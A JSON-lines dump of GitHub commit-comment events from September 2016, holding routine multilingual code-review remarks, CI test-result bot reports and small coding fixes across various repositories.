{"id":"4577211943","type":"CommitCommentEvent","actor":{"login":"CXYCheng"},"repo":{"name":"CXYCheng/Cheng"},"payload":{"comment":{"id":19062629,"position":null,"line":null,"path":null,"commit_id":"93e537adc15939318c82b93236f2a7104cf9ffaa","created_at":"2016-09-17T02:46:42Z","updated_at":"2016-09-17T02:46:42Z","body":"我"}},"created_at":"2016-09-17T02:46:42Z"}
{"id":"4577212016","type":"CommitCommentEvent","actor":{"login":"CXYCheng"},"repo":{"name":"CXYCheng/Cheng"},"payload":{"comment":{"id":19062630,"position":null,"line":null,"path":null,"commit_id":"93e537adc15939318c82b93236f2a7104cf9ffaa","created_at":"2016-09-17T02:46:45Z","updated_at":"2016-09-17T02:46:45Z","body":"我"}},"created_at":"2016-09-17T02:46:45Z"}
{"id":"4577212079","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062631,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:46:48Z","updated_at":"2016-09-17T02:46:48Z","body":"좋을게 하나도없음. 복잡해질뿐이고;;;\r\nC 쪽은 그냥 나한테 넘기셈. 그냥 내가 리펙토링 해버릴꺼야. 답답해서 못해먹겟음 =.=..."}},"created_at":"2016-09-17T02:46:48Z"}
{"id":"4577213463","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062641,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:47:51Z","updated_at":"2016-09-17T02:47:51Z","body":"좋을게 하나도없음. 복잡해질뿐이고;;;\r\nC 쪽은 그냥 나한테 넘기셈. 그냥 내가 리펙토링 해버릴꺼야. 답답해서 못해먹겟음 =.=..."}},"created_at":"2016-09-17T02:47:51Z"}
{"id":"4577213631","type":"CommitCommentEvent","actor":{"login":"sunghwan2789"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062642,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:47:59Z","updated_at":"2016-09-17T02:47:59Z","body":"변수명이나 함수명들은 유지해줘~"}},"created_at":"2016-09-17T02:47:59Z"}
{"id":"4577214817","type":"CommitCommentEvent","actor":{"login":"NatasaPeic"},"repo":{"name":"NatasaPeic/ember-routing-study"},"payload":{"comment":{"id":19062645,"position":5,"line":24,"path":"study.md","commit_id":"c3c5129bad6bfee28abf44accfb7bb593335d16e","created_at":"2016-09-17T02:48:53Z","updated_at":"2016-09-17T02:48:53Z","body":"No controllers in Ember 2.0. Using model () hooks we can access its properties in the template that renders the data for each component."}},"created_at":"2016-09-17T02:48:53Z"}
{"id":"4577215386","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062646,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-17T02:49:21Z","updated_at":"2016-09-17T02:49:21Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1819 of 2393 tests passed, 0 test warnings)\n\n * 508 tests had: AUD diffs.\n * 492 tests had: EIO diffs.\n * 213 tests had: RDD diffs.\n * 470 tests had: Table big diffs.\n * 141 tests had: ERR diffs.\n * 372 tests had: MTD diffs.\n * 271 tests had: DXF diffs.\n * 397 tests had: SHD diffs.\n * 406 tests had: BND diffs.\n * 298 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-76.01%25-red.svg)</a> \n"}},"created_at":"2016-09-17T02:49:21Z"}
{"id":"4577216431","type":"CommitCommentEvent","actor":{"login":"echin6"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19062649,"position":null,"line":null,"path":null,"commit_id":"73e9a483d3cd321fe1f8919f3554debb24073c99","created_at":"2016-09-17T02:50:15Z","updated_at":"2016-09-17T02:50:15Z","body":"Here's the updated code for not_bad().  I forgot to define the not_index\nand bad_index as global variables. Thanks for pointing it out.\n\ndef not_bad(s):\nt = []\nt = s.split()\nnot_index = -1\nbad_index = -1\nfor i in range(len(t)):\nif t[i].find('not') >= 0:\nnot_index = t.index(t[i])\nfor i in range(len(t)):\nif t[i].find('bad') >= 0:\nbad_index = t.index(t[i])\nif not_index >=0 and bad_index > not_index:\nt[bad_index] = t[bad_index].replace('bad', 'good')\ndel t[not_index:bad_index]\nprint \" \".join(t)\nelse:\nprint \" \".join(t)\n\nOn Fri, Sep 16, 2016 at 10:29 PM, Edwin Chin <echin6@gmail.com> wrote:\n\n> Here's an example of a list comprehension that substitutes for reduce():\n>\n> miles = [55, 65, 90, 100, 0, -50]\n> sum_reduce = reduce(lambda x, y: x+y, miles)\n> print sum_reduce\n>\n> sum_list = [x for x in [0] for y in miles for x in [x+y]][-1]\n> print sum_list\n>\n> On Fri, Sep 16, 2016 at 4:23 PM, Luc Demortier <notifications@github.com>\n> wrote:\n>\n>> RE: 05a-python.md\n>> cc: @lucdemortier <https://github.com/lucdemortier> @reshamametis\n>> <https://github.com/reshamametis> @aramnath <https://github.com/aramnath>\n>> @gfsoileau <https://github.com/gfsoileau> @julialintern\n>> <https://github.com/julialintern> @galvin-mj\n>> <https://github.com/galvin-mj>\n>>\n>> Hello @echin6 <https://github.com/echin6>\n>>\n>> Nice work on Python! Here are some comments:\n>>\n>>    - Can you give an example of a list comprehension that substitutes\n>>    for reduce()?\n>>    - String functions (Q6) and list functions (Q7): you need to remove\n>>    the raise NotImplementedError at the end of each routine, or else\n>>    make it do something useful.\n>>    - Function donuts: there is unnecessary indentation at line 7.\n>>    - Function both_ends: unnecessary indentation at line 32.\n>>    - Function both_ends: you can replace s[s_len-2:s_len] by s[-2:].\n>>    - Converting strings to lists is not the most efficient way to\n>>    manipulate strings. For example, the function mix_up(a,b) is most\n>>    easily implemented by return b[:2]+a[2:]+' '+a[:2]+b[2:].\n>>    - Function not_bad does not seem to be working on the examples\n>>    given...\n>>    - I like your implementation of function front_x(words)!\n>>    - General comment about defining functions: end them with return s\n>>    rather than print s (for example).\n>>    - Function linear_merge: here you are just sorting the combined list,\n>>    which takes an amount of time of order n*log(n) instead of order n,\n>>    where n is the list length. Try to make use of the fact that the\n>>    given lists list1 and list2 are already sorted to begin with.\n>>    - For the parsing problem (Q8), remember to close a file that you\n>>    opened with f = open('football.csv'). Or else use the construct with\n>>    open('football.csv', 'r') as f:. In the latter case Python will close\n>>    the file for you.\n>>\n>> 👍\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/echin6/dsp/commit/73e9a483d3cd321fe1f8919f3554debb24073c99#commitcomment-19059909>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ATKi7t6cOzzreUIgyiDiQDCYGmZGDve3ks5qqvrYgaJpZM4J_UKL>\n>> .\n>>\n>\n>\n"}},"created_at":"2016-09-17T02:50:15Z"}
{"id":"4577216861","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062650,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:50:35Z","updated_at":"2016-09-17T02:50:35Z","body":"다른 주제인데 ?. operator 있잖아요 C#에서\r\nnull checking operator\r\n\r\n제가 그거관련해서 닷넷 Issue열었거든요.\r\nforeach 문에서 ?. operator를 사용할때 warning 을 emit 하는게 좋을거라고 생각함?\r\n아니면 따로 foreach에서 ?. operator를 handle할수있는 방법을 만드는게 좋다고 생각함?"}},"created_at":"2016-09-17T02:50:35Z"}
{"id":"4577218041","type":"CommitCommentEvent","actor":{"login":"siddontang"},"repo":{"name":"pingcap/tidb"},"payload":{"comment":{"id":19062656,"position":null,"line":null,"path":null,"commit_id":"6069d15a0d22287a4a14c67556674e2e4099850a","created_at":"2016-09-17T02:51:36Z","updated_at":"2016-09-17T02:51:36Z","body":"LGTM"}},"created_at":"2016-09-17T02:51:36Z"}
{"id":"4577218502","type":"CommitCommentEvent","actor":{"login":"ArtBlnd"},"repo":{"name":"sunghwan2789/osu-Lyrics"},"payload":{"comment":{"id":19062659,"position":null,"line":null,"path":null,"commit_id":"84c4a3aeec946f875a7ce3807f634a35e9e43d37","created_at":"2016-09-17T02:52:02Z","updated_at":"2016-09-17T02:52:02Z","body":"걱정마셈 ^^ 딱 이렇게만 리팩토링 해줌.\r\n변수명이든 뭐든 \r\n\r\nhttps://github.com/dotnet/coreclr/blob/master/Documentation/coding-guidelines/clr-jit-coding-conventions.md"}},"created_at":"2016-09-17T02:52:02Z"}
{"id":"4577219977","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19062663,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-17T02:53:17Z","updated_at":"2016-09-17T02:53:17Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T02:53:17Z"}
{"id":"4577220281","type":"CommitCommentEvent","actor":{"login":"KatoRyota"},"repo":{"name":"plusize-group-work-c/calendar"},"payload":{"comment":{"id":19062667,"position":222,"line":129,"path":"src/main/java/jp/co/plusize/calendar/web/AbstractWebMethod.java","commit_id":"45c6a5eabc29af8607ad85657be9f73fbfc7a4c7","created_at":"2016-09-17T02:53:35Z","updated_at":"2016-09-17T02:53:35Z","body":"おお、なるほど、そういうことでしたか、失礼しました。\r\nありがとうございます。大変勉強になりました。"}},"created_at":"2016-09-17T02:53:35Z"}
{"id":"4577220797","type":"CommitCommentEvent","actor":{"login":"Microflow"},"repo":{"name":"Microflow/Robin-Hood-Army-Live"},"payload":{"comment":{"id":19062671,"position":1,"line":4,"path":"README.md","commit_id":"e33f16faa9cb82b84ce2ed91cea97b927803d38d","created_at":"2016-09-17T02:54:04Z","updated_at":"2016-09-17T02:54:04Z","body":"added"}},"created_at":"2016-09-17T02:54:04Z"}
{"id":"4577221924","type":"CommitCommentEvent","actor":{"login":"Microflow"},"repo":{"name":"Microflow/Robin-Hood-Army-Live"},"payload":{"comment":{"id":19062678,"position":null,"line":null,"path":null,"commit_id":"e33f16faa9cb82b84ce2ed91cea97b927803d38d","created_at":"2016-09-17T02:55:03Z","updated_at":"2016-09-17T02:55:03Z","body":"Added after split. Had two browsers open."}},"created_at":"2016-09-17T02:55:03Z"}
{"id":"4577222549","type":"CommitCommentEvent","actor":{"login":"tunturn"},"repo":{"name":"tunturn/z3concept"},"payload":{"comment":{"id":19062682,"position":null,"line":null,"path":null,"commit_id":"903362eba5f686e26d0e08745c119b69053a47b0","created_at":"2016-09-17T02:55:35Z","updated_at":"2016-09-17T02:55:35Z","body":"note to self: we're still using msm8974 display HAL so therefore don't touch this yet"}},"created_at":"2016-09-17T02:55:35Z"}
{"id":"4577223805","type":"CommitCommentEvent","actor":{"login":"yoshiboarder"},"repo":{"name":"CSStickyHeaderFlowLayout/CSStickyHeaderFlowLayout"},"payload":{"comment":{"id":19062695,"position":null,"line":null,"path":null,"commit_id":"efd4972330702ed6dda65871f2dc17b15bf9916c","created_at":"2016-09-17T02:56:48Z","updated_at":"2016-09-17T02:56:48Z","body":"Set the detachTopLayout true then parallaxHeader will detach from\r\nTopLayout. \r\nIf The parrallaxHeader’s height is fixed then detach from TopLayout\r\noption is good interaction like an original UICollectionView Controller."}},"created_at":"2016-09-17T02:56:48Z"}
{"id":"4577225007","type":"CommitCommentEvent","actor":{"login":"tfausak"},"repo":{"name":"tfausak/octane"},"payload":{"comment":{"id":19062702,"position":42,"line":85,"path":"library/Octane/Utility/Generator.hs","commit_id":"da30194c83273cc7575595c1614e124cf3d545cb","created_at":"2016-09-17T02:57:50Z","updated_at":"2016-09-17T02:57:50Z","body":"This isn't right. It's a \"shallow\" class property map. It doesn't include properties from the parent class. "}},"created_at":"2016-09-17T02:57:50Z"}
{"id":"4578569206","type":"CommitCommentEvent","actor":{"login":"Spuds"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19066633,"position":null,"line":null,"path":null,"commit_id":"f5e15207eb355fccbe6d9fe62222368c73933342","created_at":"2016-09-17T20:00:28Z","updated_at":"2016-09-17T20:00:28Z","body":"If we can, set it on by default only for httpS would be good stuff"}},"created_at":"2016-09-17T20:00:28Z"}
{"id":"4578569897","type":"CommitCommentEvent","actor":{"login":"johbo"},"repo":{"name":"rvl/bower2nix"},"payload":{"comment":{"id":19066637,"position":null,"line":null,"path":null,"commit_id":"bbecd10b0083c36d28c43b16c5b0d63227fa81e8","created_at":"2016-09-17T20:00:52Z","updated_at":"2016-09-17T20:00:52Z","body":"Really nice! I'll steal this for pip2nix as well "}},"created_at":"2016-09-17T20:00:52Z"}
{"id":"4578572351","type":"CommitCommentEvent","actor":{"login":"ghseeli"},"repo":{"name":"ghseeli/grad-school-notes"},"payload":{"comment":{"id":19066652,"position":null,"line":null,"path":null,"commit_id":"183282ab1b26b0b23e6383e8b9908ed42a40929b","created_at":"2016-09-17T20:02:30Z","updated_at":"2016-09-17T20:02:30Z","body":"Oh oops! Yeah, I meant \\phi_a in my comment; it is correct in the actual commit. Good catch!"}},"created_at":"2016-09-17T20:02:30Z"}
{"id":"4578573915","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19066659,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-17T20:02:57Z","updated_at":"2016-09-17T20:02:57Z","body":"@IBPX : What I'm saying is a game, if it wants to use sounds, needs a global sound ambience. The music is usually a big part of it.\r\nThen, if you play the game, you might prefer playing with the music that is meant for the game, not a music you choose.\r\nAlso, a music player is a really attractive thing that is forgot by many games. This some kind of \"eye-candy\" of the mind.\r\nA developped sound ambience means a developed sound experience, which also means a developed gamefeel experience : [Example of sound changing a game](https://www.youtube.com/watch?v=AJdEqssNZ-U&feature=youtu.be&t=21m29s)\r\n\r\nNo sound no gamefeel. And music is part of the sounds.\r\n\r\nIf you want to make a completed game don't force the user to complete it by himself."}},"created_at":"2016-09-17T20:02:57Z"}
{"id":"4578580085","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugins"},"payload":{"comment":{"id":19066689,"position":null,"line":null,"path":null,"commit_id":"28d18eb019211edaa92f9e539a7dd27cfcfa63c0","created_at":"2016-09-17T20:07:17Z","updated_at":"2016-09-17T20:07:17Z","body":"see here - https://github.com/oe-alliance/oe-alliance-core/tree/3.4/meta-oe/recipes-oe-alliance/enigma2-plugins\r\n\r\neopenplugins is a submodule.\r\n\r\ne2openplugins @ 7eab857\r\n\r\nyou need to update the submodule commithash in oe-alliance repository."}},"created_at":"2016-09-17T20:07:17Z"}
{"id":"4578580180","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19066691,"position":8,"line":21,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-17T20:07:22Z","updated_at":"2016-09-17T20:07:22Z","body":"Please, set public constructor to be able to inherit from this class"}},"created_at":"2016-09-17T20:07:22Z"}
{"id":"4578580863","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066693,"position":1,"line":1,"path":"00-HTML-CSS-basics/css/styles/styles.css","commit_id":"7427c30de7ec665defcb2fa1ea14931ec7c3a08a","created_at":"2016-09-17T20:07:51Z","updated_at":"2016-09-17T20:07:51Z","body":"you can combine the first four rules into one.\r\n```\r\nheader, footer, aside, nav {\r\n    background-color: #696969;\r\n}\r\n```"}},"created_at":"2016-09-17T20:07:51Z"}
{"id":"4578581739","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066697,"position":21,"line":21,"path":"00-HTML-CSS-basics/css/styles/styles.css","commit_id":"7427c30de7ec665defcb2fa1ea14931ec7c3a08a","created_at":"2016-09-17T20:08:30Z","updated_at":"2016-09-17T20:08:30Z","body":"add extra space after `:`"}},"created_at":"2016-09-17T20:08:30Z"}
{"id":"4578581926","type":"CommitCommentEvent","actor":{"login":"rossi2000"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19066698,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-17T20:08:36Z","updated_at":"2016-09-17T20:08:36Z","body":"wtf hows that happening.\r\nis it a skin or e2 issue?"}},"created_at":"2016-09-17T20:08:36Z"}
{"id":"4578583979","type":"CommitCommentEvent","actor":{"login":"shurcooL"},"repo":{"name":"shurcooL/Go-Package-Store"},"payload":{"comment":{"id":19066710,"position":null,"line":null,"path":null,"commit_id":"2e0d1eeea888947f677fc9092434b2bceea4b61d","created_at":"2016-09-17T20:10:08Z","updated_at":"2016-09-17T20:10:08Z","body":"Done in 1580ae8fcd238179a303a3fe59648ad8f2eacbf6."}},"created_at":"2016-09-17T20:10:08Z"}
{"id":"4578585191","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19066718,"position":null,"line":null,"path":null,"commit_id":"f4a8bd03404e1ab43458241d7292b4dfed1408a7","created_at":"2016-09-17T20:10:58Z","updated_at":"2016-09-17T20:10:58Z","body":"You know that plex things in APIv1_Legacy_Module was for legacy usage ?!"}},"created_at":"2016-09-17T20:10:58Z"}
{"id":"4578586357","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19066724,"position":23,"line":null,"path":"css/1_header.scss","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-17T20:11:48Z","updated_at":"2016-09-17T20:11:48Z","body":"Instead of using classes, one per div, remove the classes on each div, add a wrapper div with a class on it, and then use CSS nth-child() selectors to target each child div."}},"created_at":"2016-09-17T20:11:48Z"}
{"id":"4578587346","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19066732,"position":87,"line":null,"path":"css/1_header.scss","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-17T20:12:28Z","updated_at":"2016-09-17T20:12:28Z","body":"Use variables for each font family reference."}},"created_at":"2016-09-17T20:12:28Z"}
{"id":"4578587631","type":"CommitCommentEvent","actor":{"login":"claytantor"},"repo":{"name":"deeplearning4j/dl4j-examples"},"payload":{"comment":{"id":19066734,"position":null,"line":null,"path":null,"commit_id":"de860ca62206d63b796411ee3042efec10a861d0","created_at":"2016-09-17T20:12:40Z","updated_at":"2016-09-17T20:12:40Z","body":"@treo Looks good, thanks for the cleanup! I thought there would be a review before merge. I will endeavour to make sure I don't have empty imports on future PRs. "}},"created_at":"2016-09-17T20:12:40Z"}
{"id":"4578588892","type":"CommitCommentEvent","actor":{"login":"blacky0x0"},"repo":{"name":"dzieciou/curl-logger"},"payload":{"comment":{"id":19066737,"position":39,"line":53,"path":"src/main/java/com/github/dzieciou/testing/curl/CurlLoggingInterceptor.java","commit_id":"6b6f0358fef4e8f75ac6c9be55b7cf138e806945","created_at":"2016-09-17T20:13:30Z","updated_at":"2016-09-17T20:13:30Z","body":"It will be perfect if i could set additional parameter to produce formatted curl query with \"\\\" lines. For example: \r\n```\r\ncurl 'http://google.com' \\\r\n-H 'Accept: */*' -H 'Content-Length: 0' \\\r\n-H 'Connection: Keep-Alive' \\\r\n-H 'User-Agent: Apache-HttpClient/4.5.1 (Java/1.8.0_91)' \\\r\n--compressed    \r\n```"}},"created_at":"2016-09-17T20:13:30Z"}
{"id":"4578591494","type":"CommitCommentEvent","actor":{"login":"BransonGitomeh"},"repo":{"name":"Oneted11/guest-book"},"payload":{"comment":{"id":19066749,"position":7,"line":37,"path":"app.js","commit_id":"c3761b5983f0cc71a14ac682c96af03b4074df64","created_at":"2016-09-17T20:15:18Z","updated_at":"2016-09-17T20:15:18Z","body":"this is what ejs will look at.\r\n"}},"created_at":"2016-09-17T20:15:18Z"}
{"id":"4578591880","type":"CommitCommentEvent","actor":{"login":"BransonGitomeh"},"repo":{"name":"Oneted11/guest-book"},"payload":{"comment":{"id":19066750,"position":5,"line":12,"path":"views/index.ejs","commit_id":"c3761b5983f0cc71a14ac682c96af03b4074df64","created_at":"2016-09-17T20:15:35Z","updated_at":"2016-09-17T20:15:35Z","body":"access content\r\n"}},"created_at":"2016-09-17T20:15:35Z"}
{"id":"4578593334","type":"CommitCommentEvent","actor":{"login":"jcansdale"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19066758,"position":9,"line":9,"path":"src/BenchmarkDotNet.Core/Attributes/Jobs/SimpleJobAttribute.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-17T20:16:40Z","updated_at":"2016-09-17T20:16:40Z","body":"I'm curious why you're not using nullable types. Backwards compatibility or not appropriate here?"}},"created_at":"2016-09-17T20:16:40Z"}
{"id":"4578594231","type":"CommitCommentEvent","actor":{"login":"danielkza"},"repo":{"name":"gnunn1/terminix"},"payload":{"comment":{"id":19066762,"position":null,"line":null,"path":null,"commit_id":"d1934902183a92fcfb0c4041e621745e2d83ac93","created_at":"2016-09-17T20:17:23Z","updated_at":"2016-09-17T20:17:23Z","body":"Works perfectly, thanks a lot!"}},"created_at":"2016-09-17T20:17:23Z"}
{"id":"4578595271","type":"CommitCommentEvent","actor":{"login":"fmassa"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":19066773,"position":null,"line":null,"path":null,"commit_id":"c6554c0c394d50a74e63bb106343c9f36ddfd41a","created_at":"2016-09-17T20:18:12Z","updated_at":"2016-09-17T20:18:12Z","body":"@hughperkins I think this has to do with some deadlock that what happening in some systems. I this this is related to https://github.com/torch/image/pull/157"}},"created_at":"2016-09-17T20:18:12Z"}
{"id":"4578595934","type":"CommitCommentEvent","actor":{"login":"abdulhaq-e"},"repo":{"name":"ngrx/store"},"payload":{"comment":{"id":19066780,"position":16,"line":8,"path":"tsconfig.json","commit_id":"ac5c7f91625d96a3faabe32088bcfaa6633fd912","created_at":"2016-09-17T20:18:43Z","updated_at":"2016-09-17T20:18:43Z","body":"This is the only difference between this file and `tsconfig.dist.json`. Why do we need this file? It's not used in the build process."}},"created_at":"2016-09-17T20:18:43Z"}
{"id":"4578596053","type":"CommitCommentEvent","actor":{"login":"iamOgunyinka"},"repo":{"name":"Froist-Inc/Chislev"},"payload":{"comment":{"id":19066782,"position":null,"line":null,"path":null,"commit_id":"1c240a8f75d53352dee6e7d820687d7a7dbed2d1","created_at":"2016-09-17T20:18:48Z","updated_at":"2016-09-17T20:18:48Z","body":"Next commit should start new questions in a ViewPager and start a timeout."}},"created_at":"2016-09-17T20:18:48Z"}
{"id":"4578596183","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19066784,"position":36,"line":36,"path":"00-HTML-CSS-basics/css/styles/styles.css","commit_id":"7427c30de7ec665defcb2fa1ea14931ec7c3a08a","created_at":"2016-09-17T20:18:53Z","updated_at":"2016-09-17T20:18:53Z","body":"the properties inside a rule should be in alphaorder"}},"created_at":"2016-09-17T20:18:53Z"}
{"id":"4578598199","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"torch/torch7"},"payload":{"comment":{"id":19066793,"position":null,"line":null,"path":null,"commit_id":"c6554c0c394d50a74e63bb106343c9f36ddfd41a","created_at":"2016-09-17T20:20:23Z","updated_at":"2016-09-17T20:20:23Z","body":"that explains removing it.  as far as why it was there, just this moment found that the old Tester.lua uses it :-)\r\n\r\n![tester_sys](https://cloud.githubusercontent.com/assets/123560/18610771/899b20ca-7d1c-11e6-9087-bb168e51bb93.png)\r\n"}},"created_at":"2016-09-17T20:20:23Z"}
{"id":"4578599174","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19066797,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-17T20:21:03Z","updated_at":"2016-09-17T20:21:03Z","body":"Skin. In Magic-FHD it's fine."}},"created_at":"2016-09-17T20:21:03Z"}
{"id":"4578599471","type":"CommitCommentEvent","actor":{"login":"wesm"},"repo":{"name":"ray-project/arrow"},"payload":{"comment":{"id":19066799,"position":null,"line":null,"path":null,"commit_id":"0707062979e99e136656bf7ebfda7f4eb722b5ce","created_at":"2016-09-17T20:21:14Z","updated_at":"2016-09-17T20:21:14Z","body":"Definitely, can you submit a PR? May require a rebase. cc also @emkornfield"}},"created_at":"2016-09-17T20:21:14Z"}
{"id":"4578599494","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19066800,"position":14,"line":null,"path":"index.html","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-17T20:21:15Z","updated_at":"2016-09-17T20:21:15Z","body":"The stuff at the very top of the page should be in its own container, and that should be the header. The \"my name is Nathan\" stuff should not be in that container. That stuff should be in a section with a different class, like \"hero\" or \"welcome\" or something. That section should be a sibling of the header, and both should be children of an element with class name \"content-wrapper\".\nSo...\n`\n  .content-wrapper\n    .header\n    .hero\n    \n\n`"}},"created_at":"2016-09-17T20:21:15Z"}
{"id":"4578599925","type":"CommitCommentEvent","actor":{"login":"Matchstic"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19066804,"position":null,"line":null,"path":null,"commit_id":"7ec27c25eb875a096e2c46417c1d899a981be17e","created_at":"2016-09-17T20:21:33Z","updated_at":"2016-09-17T20:21:33Z","body":"Might be better to do this via BackBoardServices, as the values being changed here won't be respected after a respring, or when the device goes to sleep."}},"created_at":"2016-09-17T20:21:33Z"}
{"id":"4578600848","type":"CommitCommentEvent","actor":{"login":"Oneted11"},"repo":{"name":"Oneted11/guest-book"},"payload":{"comment":{"id":19066806,"position":5,"line":12,"path":"views/index.ejs","commit_id":"c3761b5983f0cc71a14ac682c96af03b4074df64","created_at":"2016-09-17T20:22:18Z","updated_at":"2016-09-17T20:22:18Z","body":"hmm so not body"}},"created_at":"2016-09-17T20:22:18Z"}
{"id":"4578601627","type":"CommitCommentEvent","actor":{"login":"Adelphos"},"repo":{"name":"njmordetzky/njmordetzky"},"payload":{"comment":{"id":19066811,"position":225,"line":null,"path":"index.html","commit_id":"372128b6c08b69dc6324bd4cedb9584e28191190","created_at":"2016-09-17T20:22:55Z","updated_at":"2016-09-17T20:22:55Z","body":"&nbsp; is a hack. Use CSS."}},"created_at":"2016-09-17T20:22:55Z"}
{"id":"4578601873","type":"CommitCommentEvent","actor":{"login":"BransonGitomeh"},"repo":{"name":"Oneted11/guest-book"},"payload":{"comment":{"id":19066813,"position":5,"line":12,"path":"views/index.ejs","commit_id":"c3761b5983f0cc71a14ac682c96af03b4074df64","created_at":"2016-09-17T20:23:07Z","updated_at":"2016-09-17T20:23:07Z","body":"yea"}},"created_at":"2016-09-17T20:23:07Z"}
{"id":"4578601930","type":"CommitCommentEvent","actor":{"login":"QwopJoans"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19066814,"position":null,"line":null,"path":null,"commit_id":"7ec27c25eb875a096e2c46417c1d899a981be17e","created_at":"2016-09-17T20:23:09Z","updated_at":"2016-09-17T20:23:09Z","body":"Ugh, you're right of course. I can't believe I hadn't noticed that."}},"created_at":"2016-09-17T20:23:09Z"}
